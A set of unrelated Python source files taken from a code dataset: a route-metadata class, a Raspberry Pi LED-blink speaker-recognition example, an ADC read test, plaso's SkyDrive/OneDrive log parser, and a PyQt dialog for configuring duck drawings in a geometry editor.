self._id = route_id
self._module = module
self._name = name
self._kwargs = {} if kwargs is None else kwargs
@property
def handler(self) -> MethodType:
"""
        The route handler function object
:return:
"""
return self._handler
@property
def func_args(self):
"""
        The parameter list of the route handler function
:return:
:rtype: OrderedDict
"""
return self._func_args
@property
def id(self) -> str:
"""
        The route ID, composed from the route's related information
:return:
"""
return self._id
@property
def module(self) -> str:
"""
        The module value specified on the decorator
:return:
"""
return self._module
@property
def name(self) -> str:
"""
        The name value specified on the decorator
:return:
"""
return self._name
@property
def kwargs(self) -> dict:
"""
        The other keyword arguments specified on the decorator
:return:
:rtype: Dict
"""
return self._kwargs
def has(self, arg_name):
"""
        Whether the given parameter exists
:param arg_name:
:return:
"""
return arg_name in self._kwargs
def get(self, arg_name: str, default_value=None):
"""
        Get the value of the given parameter
:param default_value:
:param arg_name:
:return:
"""
return self._kwargs[arg_name] if arg_name in self._kwargs else default_value
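# Usage sketch (illustrative only; the handler and values are hypothetical):
#   meta = RouteMeta(handler=some_view, func_args=OrderedDict(),
#                    route_id='app.views.some_view', module='app', name='demo',
#                    kwargs={'auth': True})
#   meta.get('auth', False)  # -> True
#   meta.has('missing')      # -> False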
| StarcoderdataPython |
113609 | <filename>examples/blink.py
import time
import RPi.GPIO as GPIO
from piwho import recognition
def blink(pin):
GPIO.output(pin,GPIO.HIGH)
time.sleep(1)
GPIO.output(pin,GPIO.LOW)
time.sleep(1)
def identify():
recog = recognition.SpeakerRecognizer('./recordings/')
friends = ['Abhishek', 'Ankit', 'Abhinav']
name = recog.identify_speaker()
    if name[0] in friends:
for i in range(10):
blink(11)
elif name[1] in friends:
        for i in range(10):
blink(12)
if __name__ == "__main__":
GPIO.setmode(GPIO.BOARD)
GPIO.setup(11,GPIO.OUT)
identify()
GPIO.cleanup()
| StarcoderdataPython |
159109 | <filename>test.py
import ADS7830
ads = ADS7830.ADS7830(1, 0x48)
for i in range(0,8):
print "{0}: {1}".format(i, ads.Read(i))
| StarcoderdataPython |
1609704 | <gh_stars>0
# -*- coding: utf-8 -*-
"""This file contains SkyDrive log file parser in plaso."""
from __future__ import unicode_literals
import pyparsing
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.parsers import logger
from plaso.parsers import manager
from plaso.parsers import text_parser
class SkyDriveLogEventData(events.EventData):
"""SkyDrive log event data.
Attributes:
detail (str): details.
log_level (str): log level.
module (str): name of the module that generated the log message.
source_code (str): source file and line number that generated the log
message.
"""
DATA_TYPE = 'skydrive:log:line'
def __init__(self):
"""Initializes event data."""
super(SkyDriveLogEventData, self).__init__(data_type=self.DATA_TYPE)
self.detail = None
self.log_level = None
self.module = None
self.source_code = None
class SkyDriveOldLogEventData(events.EventData):
"""SkyDrive old log event data.
Attributes:
log_level (str): log level.
source_code (str): source file and line number that generated the log
message.
text (str): log message.
"""
DATA_TYPE = 'skydrive:log:old:line'
def __init__(self):
"""Initializes event data."""
super(SkyDriveOldLogEventData, self).__init__(data_type=self.DATA_TYPE)
self.log_level = None
self.source_code = None
self.text = None
class SkyDriveLogParser(text_parser.PyparsingMultiLineTextParser):
"""Parses SkyDrive log files."""
NAME = 'skydrive_log'
DESCRIPTION = 'Parser for OneDrive (or SkyDrive) log files.'
_ENCODING = 'utf-8'
# Common SDF (SkyDrive Format) structures.
_COMMA = pyparsing.Literal(',').suppress()
_HYPHEN = text_parser.PyparsingConstants.HYPHEN
_THREE_DIGITS = text_parser.PyparsingConstants.THREE_DIGITS
_TWO_DIGITS = text_parser.PyparsingConstants.TWO_DIGITS
MSEC = pyparsing.Word(pyparsing.nums, max=3).setParseAction(
text_parser.PyParseIntCast)
IGNORE_FIELD = pyparsing.CharsNotIn(',').suppress()
# Date and time format used in the header is: YYYY-MM-DD-hhmmss.###
# For example: 2013-07-25-160323.291
_SDF_HEADER_DATE_TIME = pyparsing.Group(
text_parser.PyparsingConstants.DATE_ELEMENTS + _HYPHEN +
_TWO_DIGITS.setResultsName('hours') +
_TWO_DIGITS.setResultsName('minutes') +
_TWO_DIGITS.setResultsName('seconds') +
pyparsing.Literal('.').suppress() +
_THREE_DIGITS.setResultsName('milliseconds')).setResultsName(
'header_date_time')
# Date and time format used in lines other than the header is:
# MM-DD-YY,hh:mm:ss.###
# For example: 07-25-13,16:06:31.820
_SDF_DATE_TIME = (
_TWO_DIGITS.setResultsName('month') + _HYPHEN +
_TWO_DIGITS.setResultsName('day') + _HYPHEN +
_TWO_DIGITS.setResultsName('year') + _COMMA +
text_parser.PyparsingConstants.TIME_ELEMENTS + pyparsing.Suppress('.') +
_THREE_DIGITS.setResultsName('milliseconds')).setResultsName(
'date_time')
_SDF_HEADER_START = (
pyparsing.Literal('######').suppress() +
pyparsing.Literal('Logging started.').setResultsName('log_start'))
# Multiline entry end marker, matched from right to left.
_SDF_ENTRY_END = pyparsing.StringEnd() | _SDF_HEADER_START | _SDF_DATE_TIME
_SDF_LINE = (
_SDF_DATE_TIME + _COMMA +
IGNORE_FIELD + _COMMA + IGNORE_FIELD + _COMMA + IGNORE_FIELD + _COMMA +
pyparsing.CharsNotIn(',').setResultsName('module') + _COMMA +
pyparsing.CharsNotIn(',').setResultsName('source_code') + _COMMA +
IGNORE_FIELD + _COMMA + IGNORE_FIELD + _COMMA +
pyparsing.CharsNotIn(',').setResultsName('log_level') + _COMMA +
pyparsing.SkipTo(_SDF_ENTRY_END).setResultsName('detail') +
pyparsing.ZeroOrMore(pyparsing.lineEnd()))
_SDF_HEADER = (
_SDF_HEADER_START +
pyparsing.Literal('Version=').setResultsName('version_string') +
pyparsing.Word(pyparsing.nums + '.').setResultsName('version_number') +
pyparsing.Literal('StartSystemTime:').suppress() +
_SDF_HEADER_DATE_TIME +
pyparsing.Literal('StartLocalTime:').setResultsName(
'local_time_string') +
pyparsing.SkipTo(pyparsing.lineEnd()).setResultsName('details') +
pyparsing.lineEnd())
LINE_STRUCTURES = [
('logline', _SDF_LINE),
('header', _SDF_HEADER)
]
def _ParseHeader(self, parser_mediator, structure):
"""Parse header lines and store appropriate attributes.
['Logging started.', 'Version=', '17.0.2011.0627',
[2013, 7, 25], 16, 3, 23, 291, 'StartLocalTime', '<details>']
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
try:
date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=structure.header_date_time)
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(structure.header_date_time))
return
event_data = SkyDriveLogEventData()
# TODO: refactor detail to individual event data attributes.
event_data.detail = '{0:s} {1:s} {2:s} {3:s} {4:s}'.format(
structure.log_start, structure.version_string,
structure.version_number, structure.local_time_string,
structure.details)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def _ParseLine(self, parser_mediator, structure):
"""Parses a logline and store appropriate attributes.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
# TODO: Verify if date and time value is locale dependent.
month, day_of_month, year, hours, minutes, seconds, milliseconds = (
structure.date_time)
year += 2000
time_elements_tuple = (
year, month, day_of_month, hours, minutes, seconds, milliseconds)
try:
date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(structure.date_time))
return
event_data = SkyDriveLogEventData()
# Replace newlines with spaces in structure.detail to preserve output.
# TODO: refactor detail to individual event data attributes.
event_data.detail = structure.detail.replace('\n', ' ')
event_data.log_level = structure.log_level
event_data.module = structure.module
event_data.source_code = structure.source_code
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def ParseRecord(self, parser_mediator, key, structure):
"""Parse each record structure and return an EventObject if applicable.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
key (str): identifier of the structure of tokens.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
Raises:
ParseError: when the structure type is unknown.
"""
if key not in ('header', 'logline'):
raise errors.ParseError(
'Unable to parse record, unknown structure: {0:s}'.format(key))
if key == 'logline':
self._ParseLine(parser_mediator, structure)
elif key == 'header':
self._ParseHeader(parser_mediator, structure)
def VerifyStructure(self, parser_mediator, lines):
"""Verify that this file is a SkyDrive log file.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
lines (str): one or more lines from the text file.
Returns:
bool: True if this is the correct parser, False otherwise.
"""
try:
structure = self._SDF_HEADER.parseString(lines)
except pyparsing.ParseException:
logger.debug('Not a SkyDrive log file')
return False
try:
dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=structure.header_date_time)
except ValueError:
logger.debug(
'Not a SkyDrive log file, invalid date and time: {0!s}'.format(
structure.header_date_time))
return False
return True
class SkyDriveOldLogParser(text_parser.PyparsingSingleLineTextParser):
"""Parse SkyDrive old log files."""
NAME = 'skydrive_log_old'
DESCRIPTION = 'Parser for OneDrive (or SkyDrive) old log files.'
_ENCODING = 'utf-8'
_FOUR_DIGITS = text_parser.PyparsingConstants.FOUR_DIGITS
_TWO_DIGITS = text_parser.PyparsingConstants.TWO_DIGITS
# Common pyparsing objects.
_COLON = pyparsing.Literal(':')
_EXCLAMATION = pyparsing.Literal('!')
# Date and time format used in the header is: DD-MM-YYYY hhmmss.###
# For example: 08-01-2013 21:22:28.999
_DATE_TIME = pyparsing.Group(
_TWO_DIGITS.setResultsName('month') + pyparsing.Suppress('-') +
_TWO_DIGITS.setResultsName('day_of_month') + pyparsing.Suppress('-') +
_FOUR_DIGITS.setResultsName('year') +
text_parser.PyparsingConstants.TIME_MSEC_ELEMENTS).setResultsName(
'date_time')
_SOURCE_CODE = pyparsing.Combine(
pyparsing.CharsNotIn(':') +
_COLON +
text_parser.PyparsingConstants.INTEGER +
_EXCLAMATION +
pyparsing.Word(pyparsing.printables)).setResultsName('source_code')
_LOG_LEVEL = (
pyparsing.Literal('(').suppress() +
pyparsing.SkipTo(')').setResultsName('log_level') +
pyparsing.Literal(')').suppress())
_LINE = (
_DATE_TIME + _SOURCE_CODE + _LOG_LEVEL +
_COLON + pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
# Sometimes the timestamped log line is followed by an empty line,
# then by a file name plus other data and finally by another empty
# line. It could happen that a logline is split in two parts.
# These lines will not be discarded and an event will be generated
# ad-hoc (see source), based on the last one if available.
_NO_HEADER_SINGLE_LINE = (
pyparsing.NotAny(_DATE_TIME) +
pyparsing.Optional(pyparsing.Literal('->').suppress()) +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
# Define the available log line structures.
LINE_STRUCTURES = [
('logline', _LINE),
('no_header_single_line', _NO_HEADER_SINGLE_LINE),
]
def __init__(self):
"""Initializes a parser object."""
super(SkyDriveOldLogParser, self).__init__()
self._last_date_time = None
self._last_event_data = None
self.offset = 0
def _ParseLogline(self, parser_mediator, structure):
"""Parse a logline and store appropriate attributes.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
# TODO: Verify if date and time value is locale dependent.
month, day_of_month, year, hours, minutes, seconds, milliseconds = (
structure.date_time)
time_elements_tuple = (
year, month, day_of_month, hours, minutes, seconds, milliseconds)
try:
date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(structure.date_time))
return
event_data = SkyDriveOldLogEventData()
event_data.log_level = structure.log_level
event_data.offset = self.offset
event_data.source_code = structure.source_code
event_data.text = structure.text
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
self._last_date_time = date_time
self._last_event_data = event_data
def _ParseNoHeaderSingleLine(self, parser_mediator, structure):
"""Parse an isolated header line and store appropriate attributes.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
if not self._last_event_data:
logger.debug('SkyDrive, found isolated line with no previous events')
return
event_data = SkyDriveOldLogEventData()
event_data.offset = self._last_event_data.offset
event_data.text = structure.text
event = time_events.DateTimeValuesEvent(
self._last_date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
# TODO think to a possible refactoring for the non-header lines.
self._last_date_time = None
self._last_event_data = None
def ParseRecord(self, parser_mediator, key, structure):
"""Parse each record structure and return an EventObject if applicable.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
key (str): identifier of the structure of tokens.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
Raises:
ParseError: when the structure type is unknown.
"""
if key not in ('logline', 'no_header_single_line'):
raise errors.ParseError(
'Unable to parse record, unknown structure: {0:s}'.format(key))
if key == 'logline':
self._ParseLogline(parser_mediator, structure)
elif key == 'no_header_single_line':
self._ParseNoHeaderSingleLine(parser_mediator, structure)
def VerifyStructure(self, parser_mediator, line):
"""Verify that this file is a SkyDrive old log file.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
line (str): line from a text file.
Returns:
bool: True if the line is in the expected format, False if not.
"""
try:
structure = self._LINE.parseString(line)
except pyparsing.ParseException:
logger.debug('Not a SkyDrive old log file')
return False
day_of_month, month, year, hours, minutes, seconds, milliseconds = (
structure.date_time)
time_elements_tuple = (
year, month, day_of_month, hours, minutes, seconds, milliseconds)
try:
dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
logger.debug(
'Not a SkyDrive old log file, invalid date and time: {0!s}'.format(
structure.date_time))
return False
return True
manager.ParsersManager.RegisterParsers([
SkyDriveLogParser, SkyDriveOldLogParser])
| StarcoderdataPython |
3253895 | <gh_stars>0
"""
this file contains the definition of the qui window for the property
settings for ducks
"""
from PyQt5 import QtCore, QtWidgets, QtGui, uic
from Utils import save_eucl_file
from Dialog.Colour import ColourDialog
from Constants import *
#fill QT interface with the correct values
def fill_fields(dialog):
point = dialog.scene.eucl["points"][dialog.pt_idx]
if point["duck"]["show"] == True:
dialog.ui.duck_show.setChecked(True)
else:
dialog.ui.duck_show.setChecked(False)
if point["duck"]["type"] == 'random':
dialog.all_group_enabled_disabled(False)
dialog.ui.body_group.setEnabled(True)
dialog.checkb_enabled_disabled(False)
dialog.ui.rad_random.setChecked(True)
if point["duck"]["type"] == 'special':
dialog.all_group_enabled_disabled(False)
dialog.ui.special_group.setEnabled(True)
dialog.ui.body_group.setEnabled(True)
dialog.checkb_enabled_disabled(False)
dialog.ui.rad_special.setChecked(True)
if point["duck"]["type"] == 'custom':
dialog.all_group_enabled_disabled(True)
dialog.ui.special_group.setEnabled(False)
dialog.ui.chess_group.setEnabled(False)
dialog.checkb_enabled_disabled(True)
dialog.checkb_checked()
dialog.ui.rad_custom.setChecked(True)
if point["duck"]["type"] == 'chess':
dialog.all_group_enabled_disabled(False)
dialog.ui.chess_group.setEnabled(True)
dialog.ui.body_group.setEnabled(True)
dialog.checkb_enabled_disabled(False)
dialog.ui.rad_chess.setChecked(True)
if dialog.pt_idx == 0:
dialog.all_group_enabled_disabled(False)
dialog.ui.body_group.setEnabled(True)
dialog.checkb_enabled_disabled(False)
dialog.ui.special_combo.setCurrentIndex(DUCK_SPECIAL.index(point["duck"]["special"]))
dialog.ui.chess_combo.setCurrentIndex(DUCK_CHESS.index(point["duck"]["chess"]))
dialog.ui.bill_combo.setCurrentIndex(DUCK_BILLS.index(point["duck"]["bill"]))
dialog.ui.hair_combo.setCurrentIndex(DUCK_HAIRS.index(point["duck"]["hair"]))
dialog.ui.glasses_combo.setCurrentIndex(DUCK_GLASSESS.index(point["duck"]["glasses"]))
dialog.ui.hat_combo.setCurrentIndex(DUCK_HATS.index(point["duck"]["hat"]))
dialog.ui.necklace_combo.setCurrentIndex(DUCK_NECKLACES.index(point["duck"]["necklace"]))
dialog.ui.accessories_combo.setCurrentIndex(DUCK_ACCESSORIES.index(point["duck"]["accessories"]))
dialog.ui.bubble_combo.setCurrentIndex(DUCK_SPEECH.index(point["duck"]["thought"]))
dialog.ui.size_hslider.setValue(point["duck"]["size"]*10)
dialog.ui.size_label.setText(str(point["duck"]["size"]))
dialog.ui.le_bubble_text.setText(point["duck"]["thought_text"])
dialog.ui.le_signpost_text.setText(point["duck"]["accessories_text"])
duck = point["duck"]
if not duck["clothing"]["show"]:
dialog.ui.duck_clothing.setChecked(False)
else:
dialog.ui.duck_clothing.setChecked(True)
if duck["water"][0] == 'F':
dialog.ui.duck_water.setChecked(False)
else:
dialog.ui.duck_water.setChecked(True)
if duck["eyebrows"][0] == 'F':
dialog.ui.duck_eyebrows.setChecked(False)
else:
dialog.ui.duck_eyebrows.setChecked(True)
if duck["beard"][0] == 'F':
dialog.ui.duck_beard.setChecked(False)
else:
dialog.ui.duck_beard.setChecked(True)
if duck["buttons"][0] == 'F':
dialog.ui.duck_buttons.setChecked(False)
else:
dialog.ui.duck_buttons.setChecked(True)
if duck["lapel"][0] == 'F':
dialog.ui.duck_lapel.setChecked(False)
else:
dialog.ui.duck_lapel.setChecked(True)
if duck["horsetail"][0] == 'F':
dialog.ui.duck_horse_tail.setChecked(False)
else:
dialog.ui.duck_horse_tail.setChecked(True)
if duck["clothing"]["tshirt"][0] == 'F':
dialog.ui.duck_tshirt.setChecked(False)
else:
dialog.ui.duck_tshirt.setChecked(True)
if duck["clothing"]["jacket"][0] == 'F':
dialog.ui.duck_jacket.setChecked(False)
else:
dialog.ui.duck_jacket.setChecked(True)
if duck["clothing"]["tie"][0] == 'F':
dialog.ui.duck_tie.setChecked(False)
else:
dialog.ui.duck_tie.setChecked(True)
if duck["clothing"]["bowtie"][0] == 'F':
dialog.ui.duck_bowtie.setChecked(False)
else:
dialog.ui.duck_bowtie.setChecked(True)
if duck["clothing"]["aodai"][0] == 'F':
dialog.ui.duck_aodai.setChecked(False)
else:
dialog.ui.duck_aodai.setChecked(True)
if duck["clothing"]["cape"][0] == 'F':
dialog.ui.duck_cape.setChecked(False)
else:
dialog.ui.duck_cape.setChecked(True)
if dialog.ui.accessories_combo.currentIndex() in [2, 3]:
dialog.ui.le_signpost_text.setEnabled(True)
dialog.ui.label_signpost.setEnabled(True)
else:
dialog.ui.le_signpost_text.setEnabled(False)
dialog.ui.label_signpost.setEnabled(False)
if duck["accessories"] in DUCK_EXTRA:
dialog.ui.label_accessories_extra.setEnabled(True)
dialog.ui.pb_accessories_extra.setEnabled(True)
dialog.ui.label_accessories_extra.setText('extra ' + DUCK_EXTRA[duck["accessories"]])
else:
dialog.ui.label_accessories_extra.setEnabled(False)
dialog.ui.pb_accessories_extra.setEnabled(False)
dialog.ui.label_accessories_extra.setText('extra')
if duck["hat"] in DUCK_EXTRA:
dialog.ui.label_hat_extra.setEnabled(True)
dialog.ui.pb_hat_extra.setEnabled(True)
dialog.ui.label_hat_extra.setText('extra ' + DUCK_EXTRA[duck["hat"]])
else:
dialog.ui.label_hat_extra.setEnabled(False)
dialog.ui.pb_hat_extra.setEnabled(False)
dialog.ui.label_hat_extra.setText('extra')
# class for the duck window
class DuckPropertiesDialog(QtWidgets.QDialog):
def __init__ (self, scene, pt_idx):
super(DuckPropertiesDialog, self).__init__ ()
self.ui = uic.loadUi('layouts/duck_dialog.ui', self)
self.setWindowTitle("Duck properties")
self.scene = scene
self.pt_idx = pt_idx
fill_fields(self)
duck = self.scene.eucl["points"][self.pt_idx]["duck"]
self.ui.duck_show.stateChanged.connect(
lambda state: self.checkb_state_changed(state, duck, "show"))
self.ui.rad_random.clicked.connect(self.rad_random_clicked)
self.ui.rad_special.clicked.connect(self.rad_special_clicked)
self.ui.rad_custom.clicked.connect(self.rad_custom_clicked)
self.ui.rad_chess.clicked.connect(self.rad_chess_clicked)
self.ui.special_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_SPECIAL, duck, "special"))
self.ui.chess_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_CHESS, duck, "chess"))
self.ui.bill_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_BILLS, duck, "bill"))
self.ui.hair_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_HAIRS, duck, "hair"))
self.ui.glasses_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_GLASSESS, duck, "glasses"))
self.ui.hat_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_HATS, duck, "hat"))
self.ui.necklace_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_NECKLACES, duck, "necklace"))
self.ui.accessories_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_ACCESSORIES, duck, "accessories"))
self.ui.duck_clothing.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "show"))
self.ui.duck_water.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "water"))
self.ui.duck_eyebrows.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "eyebrows"))
self.ui.duck_beard.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "beard"))
self.ui.duck_buttons.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "buttons"))
self.ui.duck_lapel.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "lapel"))
self.ui.duck_horse_tail.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "horsetail"))
self.ui.duck_tshirt.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "tshirt"))
self.ui.duck_jacket.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "jacket"))
self.ui.duck_tie.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "tie"))
self.ui.duck_bowtie.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "bowtie"))
self.ui.duck_aodai.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "aodai"))
self.ui.duck_cape.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "cape"))
self.ui.size_hslider.valueChanged.connect(
lambda value : self.hslider_moved(value, duck, "size", self.ui.size_label, 10))
self.ui.size_hslider.sliderReleased.connect(self.hslider_released)
self.ui.pb_bill.clicked.connect(
lambda : self.colour_open(duck, "bill_colour"))
self.ui.pb_hair.clicked.connect(
lambda : self.colour_open(duck, "hair_colour"))
self.ui.pb_glasses.clicked.connect(
lambda : self.colour_open(duck, "glasses_colour"))
self.ui.pb_hat.clicked.connect(
lambda : self.colour_open(duck, "hat_colour"))
self.ui.pb_hat_extra.clicked.connect(
lambda : self.colour_open(duck, "hat_extra_colour"))
self.ui.pb_accessories.clicked.connect(
lambda : self.colour_open(duck, "accessories_colour"))
self.ui.pb_accessories_extra.clicked.connect(
lambda : self.colour_open(duck, "accessories_extra_colour"))
self.ui.pb_necklace.clicked.connect(
lambda : self.colour_open(duck, "necklace_colour"))
self.ui.pb_body.clicked.connect(
lambda : self.colour_open(duck, "body_colour"))
self.ui.pb_tshirt.clicked.connect(
lambda : self.colour_open(duck["clothing"], "tshirt"))
self.ui.pb_jacket.clicked.connect(
lambda : self.colour_open(duck["clothing"], "jacket"))
self.ui.pb_tie.clicked.connect(
lambda : self.colour_open(duck["clothing"], "tie"))
self.ui.pb_bowtie.clicked.connect(
lambda : self.colour_open(duck["clothing"], "bowtie"))
self.ui.pb_aodai.clicked.connect(
lambda : self.colour_open(duck["clothing"], "aodai"))
self.ui.pb_cape.clicked.connect(
lambda : self.colour_open(duck["clothing"], "cape"))
self.ui.pb_water.clicked.connect(
lambda : self.colour_open(duck, "water"))
self.ui.pb_eyebrows.clicked.connect(
lambda : self.colour_open(duck, "eyebrows"))
self.ui.pb_beard.clicked.connect(
lambda : self.colour_open(duck, "beard"))
self.ui.pb_buttons.clicked.connect(
lambda : self.colour_open(duck, "buttons"))
self.ui.pb_lapel.clicked.connect(
lambda : self.colour_open(duck, "lapel"))
self.ui.pb_horse_tail.clicked.connect(
lambda : self.colour_open(duck, "horsetail"))
self.ui.pb_bubble.clicked.connect(
lambda : self.colour_open(duck, "thought_colour"))
self.ui.le_signpost_text.editingFinished.connect(self.le_signpost_text_editing_finished)
self.ui.le_bubble_text.editingFinished.connect(self.le_bubble_text_editing_finished)
self.ui.bubble_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_SPEECH, duck, "thought"))
def keyPressEvent(self,event):
# performs autocompile when f5 is pressed
if event.matches(QtGui.QKeySequence.Refresh):
previous_autocompile = self.scene.autocompile
self.scene.autocompile = True
self.scene.compile_tkz_and_render()
self.scene.autocompile = previous_autocompile
elif event.matches(QtGui.QKeySequence.Save):
Utils.save(self) #.save_eucl_file('data.json', self.scene.eucl)
elif event.matches(QtGui.QKeySequence.SaveAs):
Utils.save_as(self) #.save_eucl_file('data.json', self.scene.eucl)
def checkb_state_changed(self, state, my_object, property):
if state == QtCore.Qt.Unchecked:
if self.pt_idx == 0 and property == 'show':
for point in self.scene.eucl["points"]:
point["duck"]["show"] = False
if property in ["water", "eyebrows", "beard", "buttons", "lapel", "horsetail",\
"tshirt", "jacket", "tie", "bowtie", "aodai", "cape"]:
my_object[property] = 'F' + my_object[property][1:]
else:
my_object[property] = False
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
elif state == QtCore.Qt.Checked:
if self.pt_idx == 0 and property == 'show':
for point in self.scene.eucl["points"]:
point["duck"]["show"] = True
if property in ["water", "eyebrows", "beard", "buttons", "lapel", "horsetail",\
"tshirt", "jacket", "tie", "bowtie", "aodai", "cape"]:
my_object[property] = 'T' + my_object[property][1:]
else:
my_object[property] = True
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def rad_random_clicked(self):
if self.pt_idx == 0:
for point in self.scene.eucl["points"]:
point["duck"]["type"] = 'random'
self.scene.eucl["points"][self.pt_idx]["duck"]["type"] = 'random'
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def rad_special_clicked(self):
if self.pt_idx == 0:
for point in self.scene.eucl["points"]:
point["duck"]["type"] = 'special'
self.scene.eucl["points"][self.pt_idx]["duck"]["type"] = 'special'
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def rad_chess_clicked(self):
if self.pt_idx == 0:
for point in self.scene.eucl["points"]:
point["duck"]["type"] = 'chess'
self.scene.eucl["points"][self.pt_idx]["duck"]["type"] = 'chess'
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def rad_custom_clicked(self):
if self.pt_idx == 0:
for point in self.scene.eucl["points"]:
point["duck"]["type"] = 'custom'
self.scene.eucl["points"][self.pt_idx]["duck"]["type"] = 'custom'
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def checkb_checked(self):
duck = self.scene.eucl["points"][self.pt_idx]["duck"]
if not duck["clothing"]["show"]:
self.ui.clothing_group.setEnabled(False)
else:
self.ui.clothing_group.setEnabled(True)
if duck["water"][0] == 'F':
self.ui.water_group.setEnabled(False)
else:
self.ui.water_group.setEnabled(True)
if duck["eyebrows"][0] == 'F':
self.ui.eyebrows_group.setEnabled(False)
else:
self.ui.eyebrows_group.setEnabled(True)
if duck["beard"][0] == 'F':
self.ui.beard_group.setEnabled(False)
else:
self.ui.beard_group.setEnabled(True)
if duck["buttons"][0] == 'F':
self.ui.buttons_group.setEnabled(False)
else:
self.ui.buttons_group.setEnabled(True)
if duck["lapel"][0] == 'F':
self.ui.lapel_group.setEnabled(False)
else:
self.ui.lapel_group.setEnabled(True)
if duck["horsetail"][0] == 'F':
self.ui.horse_tail_group.setEnabled(False)
else:
self.ui.horse_tail_group.setEnabled(True)
def checkb_enabled_disabled(self, boolean):
self.ui.duck_clothing.setEnabled(boolean)
self.ui.duck_water.setEnabled(boolean)
self.ui.duck_eyebrows.setEnabled(boolean)
self.ui.duck_beard.setEnabled(boolean)
self.ui.duck_buttons.setEnabled(boolean)
self.ui.duck_lapel.setEnabled(boolean)
self.ui.duck_horse_tail.setEnabled(boolean)
def all_group_enabled_disabled(self, boolean):
self.ui.bill_group.setEnabled(boolean)
self.ui.hair_group.setEnabled(boolean)
self.ui.glasses_group.setEnabled(boolean)
self.ui.clothing_group.setEnabled(boolean)
self.ui.water_group.setEnabled(boolean)
self.ui.eyebrows_group.setEnabled(boolean)
self.ui.beard_group.setEnabled(boolean)
self.ui.buttons_group.setEnabled(boolean)
self.ui.lapel_group.setEnabled(boolean)
self.ui.horse_tail_group.setEnabled(boolean)
self.ui.necklace_group.setEnabled(boolean)
self.ui.hat_group.setEnabled(boolean)
self.ui.accessories_group.setEnabled(boolean)
self.ui.special_group.setEnabled(boolean)
self.ui.chess_group.setEnabled(boolean)
self.ui.thought_group.setEnabled(boolean)
self.ui.body_group.setEnabled(boolean)
def cb_selector_current_idx_changed(self, value, vlist, my_object, property):
my_object[property] = vlist[value]
